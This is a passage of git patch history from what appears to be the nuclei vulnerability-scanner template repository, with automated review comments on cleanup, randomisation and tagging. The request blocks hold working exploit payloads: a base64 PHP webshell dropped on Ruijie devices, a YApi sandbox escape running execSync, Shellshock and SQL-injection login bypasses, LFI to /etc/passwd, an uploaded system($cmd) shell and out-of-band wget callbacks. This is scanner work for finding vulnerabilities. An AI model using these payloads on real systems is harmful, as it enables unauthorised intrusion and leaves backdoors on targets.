type: word words: - - "User pdnuclei successfully added to Database" + - "User {{randstr}} successfully added to Database" + part: body - type: status status: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index d2fd73f7de..c3c1bccd2b 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password={{admin}} 
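Review bot: Dropping `# This template supports the user creation part only. To triggering an RCE, see reference[2].` removes the only statement that this template does not actually reach RCE and instead creates a persistent account named `{{randstr}}` on the target that nothing deletes. Keep that caveat in the template's metadata, e.g. `description: Creates an rConfig user through the unauthenticated userprocess.php; turning this into RCE needs the extra step in reference[2].`, and tag it `intrusive`. Two smaller things in the second hunk: `test@{{randstr.tld}}` does not look like a standard nuclei helper, so if it is not expanded the literal string is sent, and the matcher `User {{randstr}} successfully added to Database` only works if `{{randstr}}` resolves to the same value in the request and the matcher — both are worth a quick check or a comment.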
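Review bot: Removing `X-Requested-With: XMLHttpRequest` from both `/login.php` requests in ruijie-eg-rce is not a pure header cleanup if the endpoint gates its AJAX/JSON path on that header; later commits in this same series put the header back on other templates (CVE-2020-12720, simple-employee-rce, wordpress-rce-simplefilelist), which suggests it was load-bearing at least there. Re-test the login step against a live target before relying on this change, or restore the single line `X-Requested-With: XMLHttpRequest` in both requests. The `{{admin}}` value used in the second request comes from an extractor outside the hunk.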
@@ -33,7 +29,6 @@ requests: POST /cli.php?a=shell HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 notdelay=true&command=cat /etc/passwd diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 8f52c10b10..a93e658328 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /guest_auth/guestIsUp.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - | GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 2 matchers-condition: and matchers: diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 82c8b1411b..902279b7f8 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -5,8 +5,7 @@ info: author: gy741 severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: - - https://www.exploit-db.com/exploits/49344 + reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob requests: 
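Review bot: The first ruijie-networks-rce request drops `poc.php` (the base64 decodes to a `system($_GET['cmd'])` shell) into `/guest_auth/` and the template never removes it, so one scan leaves an unauthenticated webshell at a fixed, well-known path on the target. At minimum use `{{randstr}}.php` for the file name and add a third request that deletes it, e.g. `GET /guest_auth/<name>.php?cmd=rm%20-f%20<name>.php`, or have the dropped PHP `unlink(__FILE__)` after running the command; tag the template `intrusive` (the `info` block is outside the hunk).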
@@ -14,10 +13,7 @@ requests: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index d61b1a5d52..574d070ebd 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -12,10 +12,7 @@ requests: - | POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 - Content-Length: 239 Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - Accept-Encoding: gzip ----------------------------835846770881083140190633 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index da355a03d4..b9fc3b354d 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -12,15 +12,8 @@ requests: - | POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: deflate - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 - Content-Length: 267 - DNT: 1 - Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="poc.php" 
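Review bot: `filename="test.<>php"` in showdoc-file-upload-rce keeps a fixed base name, so the file this upload creates has the same name on every target and every scan; the zebra-form template in this same commit moved to `filename="{{randstr}}.txt"`, and `filename="{{randstr}}.<>php"` would be consistent here (the `<>` is presumably the extension-filter bypass — worth a comment above the part). The part body and the follow-up request are outside the hunk; if the uploaded content is a webshell, the template should also be tagged `intrusive` and clean up after itself.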
@@ -31,11 +24,10 @@ requests: system($cmd); ?> -----------------------------5825462663702204104870787337-- + - | GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 2 extractors: - type: regex diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 95c345c98a..7d1c7a4706 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -16,8 +16,6 @@ requests: Host: {{Hostname}} User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" Accept: */* - Accept-Language: en - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 610c0e676f..d0dcd358f6 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -11,14 +11,10 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/login.php + Referer: {{BaseURL}}/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 5fc0d294da..92f0058339 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml 
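Review bot: `GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd` confirms execution through the `system($cmd)` PHP file uploaded in the previous request, but nothing deletes that file afterwards, so the scan leaves an unauthenticated command-execution endpoint in the uploads directory. Use a `{{randstr}}.php` name for the upload and add a final request `GET /uploads/employees_ids/{{endpoint}}?cmd=rm%20-f%20{{endpoint}}` (or `unlink(__FILE__)` inside the dropped PHP), and tag the template `intrusive` (the `info` block is outside the hunk).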
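Review bot: `User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"` in sonicwall-sslvpn-shellshock sits in what looks like a raw request block (the `Host: {{Hostname}}` line above it only makes sense in `raw:` requests; the `raw:` line itself is outside the hunk), where the double quotes are not YAML syntax but part of the header value sent on the wire. Bash only treats an environment value that begins with `() {` as a function definition, so a leading `"` would defeat the Shellshock trigger; if this is a raw block, drop the quotes: `User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'`. The `headers:` mapping form used by rce-shellshock-user-agent in this same commit is where the quotes are required.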
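Review bot: `Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8` in vpms-auth-bypass keeps a hard-coded session id while zms-auth-bypass in this same commit switches to `Cookie: PHPSESSID={{randstr}}`; a constant id is a trivial scanner fingerprint and can collide with a real session of that name if it already exists on the target. Change it to `Cookie: PHPSESSID={{randstr}}` and leave the rest of the request as is.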
@@ -16,61 +16,43 @@ requests: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* - Accept-Encoding: gzip - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 106 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 89 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 382 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = 
myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip cookie-reuse: true extractors: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index a67e1f1177..f8e73a2cf6 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 68e0db9695..fbc1e03821 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -11,15 +11,11 @@ requests: - | POST /zms/admin/index.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: close - Referer: http://{{Hostname}}/zms/admin/index.php - Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p - Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= 
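Review bot: The seven-step yapi-rce chain leaves every artifact it creates on the target — a registered user (`{{randstr}}@example.com`), a project, an interface, and an advanced-mock script whose `execSync("cat /etc/passwd")` runs again for anyone who later requests `/mock/{{project_id}}/{{randstr_1}}` — so a scan installs a persistent, unauthenticated command-execution endpoint. Add trailing requests that delete the mock and the project (YApi exposes delete APIs; verify the exact paths against the reference, which is outside the hunk), tag the template `intrusive`, and state in `description:` that the template creates an account and a project on the target. The `{{group_id}}`, `{{project_id}}` and `{{interface_id}}` values come from extractors outside the hunk.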
diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 981b5ee0e5..0041ad36f2 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -14,12 +14,8 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"} @@ -27,11 +23,7 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index 1f8a3bb2db..ab2d3656d9 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml 
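Review bot: Both requests use a constant livechat guest token `cvenucleirocketchat` and a constant visitor identity (`cve-2020-nuclei`, `cve@nuclei.local`), so every scan registers the same guest on the target, which is an easy fingerprint and a collision between concurrent scans of one instance. Use `{{randstr}}` for the token and the name in both requests (the second request must reuse the same token the first registered), in line with the `{{randstr}}` changes this commit makes elsewhere, and mention in `description:` (outside the hunk) that a livechat guest record is created on the target.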
@@ -12,22 +12,13 @@ requests: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index 481c5d6f76..eec6c6f958 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -15,8 +15,6 @@ requests: POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -45,11 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 Accept: */* - Connection: close - X-Requested-With: XMLHttpRequest - Content-Length: 81 Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php 
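Review bot: The rename request `eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php` turns the uploaded file into `nuclei.php` with a fixed, public name under `/wp-content/uploads/simple-file-list/`, and nothing in the template removes it afterwards; the uploaded content is outside the hunk, but the template's own description says it is PHP code, so this is a persistent unauthenticated script left in the uploads directory. Randomize the name with `{{randstr}}` in the upload, the rename and the final GET, add a cleanup request through the same `ee-file-engine.php` (a delete action, if the plugin supports one — verify), and tag `intrusive` (the `info` block is outside the hunk).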
@@ -58,7 +52,6 @@ requests: GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 402dc8c283..eb070bb0f2 100644 --- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -11,18 +11,12 @@ requests: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index a0a6785d10..7075c485bf 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml 
@@ -11,11 +11,7 @@ requests: - | POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 158 - Connection: close action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com From 6fee9b2b1beea8019f3464b821ce2dd74967bbea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:48:54 +0530 Subject: [PATCH 105/339] Create python-metrics.yaml --- misconfiguration/python-metrics.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/python-metrics.yaml diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml new file mode 100644 index 0000000000..6ff4afb35d --- /dev/null +++ b/misconfiguration/python-metrics.yaml @@ -0,0 +1,27 @@ +id: python-metrics + +info: + name: Detect Python Exposed Metrics + author: dhiyaneshDK + severity: low + description: Information Disclosure of Garbage Collection + tags: exposure,devops + reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - "python_gc_objects_collected_total" + - "python_info" + + - type: status + status: + - 200 From 85adcd95beb3c53cfb3b6c7a35c9adf8b8d5620b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 17:58:43 +0530 Subject: [PATCH 106/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 6ff4afb35d..047cbfd1b5 100644 --- a/misconfiguration/python-metrics.yaml 
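Review bot: The SSRF check in wp-multiple-theme-ssrf points the `url` argument at `http://example.com`, so confirming the vulnerability depends on the target reaching a third-party host and on its response being reflected (the matcher is outside the hunk). Pointing it at `{{interactsh-url}}` and matching on the interactsh protocol, as sar2html-rce and zimbra-preauth-ssrf do in this same commit, proves the request actually left the server and removes the dependency on example.com.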
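Review bot: `description: Information Disclosure of Garbage Collection` undersells what the matcher detects: `python_gc_objects_collected_total` and `python_info` are the default series of a Prometheus client exporter, so a hit means an application's whole `/metrics` endpoint is reachable without authentication, and `python_info` normally carries the interpreter version in its labels (confirm against a sample response). Suggest `description: Unauthenticated Prometheus-style /metrics endpoint of a Python application. Exposes runtime details (GC counters, python_info with interpreter version) and any application metrics registered alongside them.` and adding `prometheus` to `tags`.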
+++ b/misconfiguration/python-metrics.yaml @@ -6,8 +6,10 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + requests: - method: GET path: From 664ac520656aedcbcf49fa9255117cf0c40b6044 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 Sep 2021 18:09:15 +0530 Subject: [PATCH 107/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 047cbfd1b5..65dcbe3063 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c - + requests: - method: GET path: From 39a0ffd0a554697564428245d41f543f08f5213e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 18:19:15 +0530 Subject: [PATCH 108/339] Update python-metrics.yaml --- misconfiguration/python-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml index 65dcbe3063..593b019435 100644 --- a/misconfiguration/python-metrics.yaml +++ b/misconfiguration/python-metrics.yaml 
@@ -6,9 +6,9 @@ info: severity: low description: Information Disclosure of Garbage Collection tags: exposure,devops - reference: - - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c requests: - method: GET From 8828d0f2ed2d385f1534bc284f5114f10b8e59bc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:44:20 +0700 Subject: [PATCH 109/339] Create CVE-2010-1719.yaml --- cves/2010/CVE-2010-1719.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1719.yaml diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml new file mode 100644 index 0000000000..b41a153cae --- /dev/null +++ b/cves/2010/CVE-2010-1719.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1719 + +info: + name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12233 + - https://www.cvedetails.com/cve/CVE-2010-1719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bbf4f2ffebade1a49f488b1a19c9f2370125b0f6 Mon Sep 17 00:00:00 2001 
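Review bot: The CVE-2010-1719 path relies on the trailing `%00` to cut off whatever suffix `index.php` appends to the `controller` value, and that only works on PHP builds that still honor null bytes in filesystem paths (removed in PHP 5.3.4), so on a patched interpreter a vulnerable component is reported as clean. Put that limitation next to the payload, `# %00 truncation only works on PHP < 5.3.4; newer interpreters will not expose the file even if the component is vulnerable`, and add `part: body` to the regex matcher so the intent is explicit rather than relying on the default.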
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 9 Sep 2021 09:25:04 +0700 Subject: [PATCH 110/339] Updates severity --- default-logins/frps/frp-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index f096e880f6..605d43a20e 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -3,7 +3,7 @@ id: frp-default-credentials info: name: Frp Default credentials author: pikpikcu - severity: info + severity: high tags: frp,default-login reference: https://github.com/fatedier/frp/issues/1840 From 6a75ff9242dbe9d179dd0e46ce39f9ae944853ed Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 01:28:04 -0300 Subject: [PATCH 111/339] Create confluence-detector.yaml --- technologies/confluence-detector.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 technologies/confluence-detector.yaml diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detector.yaml new file mode 100644 index 0000000000..a418291693 --- /dev/null +++ b/technologies/confluence-detector.yaml @@ -0,0 +1,39 @@ +id: confluence-detector + +info: + name: confluence detector + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + tags: confluence + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: or + + matchers: + - type: word + words: + - '-Confluence-' + - '-confluence-' + part: header + condition: or + + - type: word + words: + - 'confluence-base-url' + part: body + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' 
